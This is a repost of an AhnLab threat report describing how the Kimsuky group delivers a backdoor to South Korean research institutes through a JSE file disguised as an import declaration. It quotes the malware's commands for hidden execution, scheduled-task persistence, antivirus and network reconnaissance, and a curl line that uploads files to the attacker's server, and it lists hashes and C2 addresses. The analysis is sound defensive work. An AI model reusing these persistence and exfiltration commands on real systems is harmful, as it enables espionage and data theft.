Kimsuky Targets South Korean Research Institutes with Fake Import Declaration

by Prapattimynk, Thursday, 30 November 2023 (3 months ago)
Kimsuky Targets South Korean Research Institutes with Fake Import Declaration


AhnLab Security Emergency response Center (ASEC) has recently identified that the Kimsuky threat group is distributing a malicious JSE file disguised as an import declaration to research institutes in South Korea. The threat actor ultimately uses a backdoor to steal information and execute commands.

The file name of the dropper disguised as an import declaration is as follows.

  • Import Declaration_Official Stamp Affixed.jse

The file contains an obfuscated PowerShell script, a Base64-encoded backdoor file, and a legitimate PDF file.

Figure 1. Obfuscated JSE file content

A legitimate PDF file is saved under the file name ‘Import Declaration.PDF’ and automatically executed by the PowerShell script. This file contains the attack target’s information. Creating and executing a legitimate PDF file is likely done to prevent users from recognizing that a malicious backdoor file is being executed in the process.

Figure 2. Decoy file (Import Declaration.PDF)

In the background, a backdoor is created in the %ProgramData% path under the file name ‘vuVvMKg.i3IO’, and the malware is run using rundll32.exe.

  • powershell.exe -windowstyle hidden rundll32.exe ProgramData\vuVuMKg.i3IO UpdateSystem

The malware copies itself into the %ProgramData% and %Public% paths under the file name ‘IconCache.db’ for persistence before registering itself to the task scheduler.

  • cmd.exe /c schtasks /create /tn iconcache /tr “rundll32.exe C:ProgramdataIconCache.db UpdateSystem /sc onlogon /rl highest /f

To exfiltrate system information, the backdoor uses the wmic command to check the anti-malware status of the attack target and collects network information through the ipconfig command.

  • cmd.exe /U /c wimc /namespace:\rootsecuritycenter2 path antivirusproduct get displayname > vaccine.txt
  • ipconfig /all

Afterwards, information such as the host name, user name, and OS information is collected. For the malware to avoid detection, it encodes the command execution results and sends them to the C2.

Figure 3. Collected system information
Figure 4. Information being encoded and transmitted

Also, the following commands (including system information exfiltration) are run, behaving as a backdoor in the affected system. Additionally, the curl tool is used to upload information to the C2 server.

  • getinfo: System information
  • die: Terminate
  • where: Execution path
  • run: Run certain files and commands
  • curl -k -F “fileToUpload=@%s” -F “id=%S” %s

Because the bait file is also run, users cannot recognize that their systems are infected by malware. As these types of malware mainly attack specific targets, users should refrain from running attachments in emails sent from unknown sources.

[File Detection]

  • Dropper/JS.Generic (2023.11.16.02)
  • Backdoor/Win.Nikidoor (2023.11.15.03)

[IOC]

  • MD5
    d2335df6d17fc7c2a5d0583423e39ff8
    d6abeeb469e2417bbcd3c122c06ba099
  • C2
    hxxp://rscnode.dothome.co[.]kr/index.php
    hxxp://rscnode.dothome.co[.]kr/upload.php

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Comments

Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.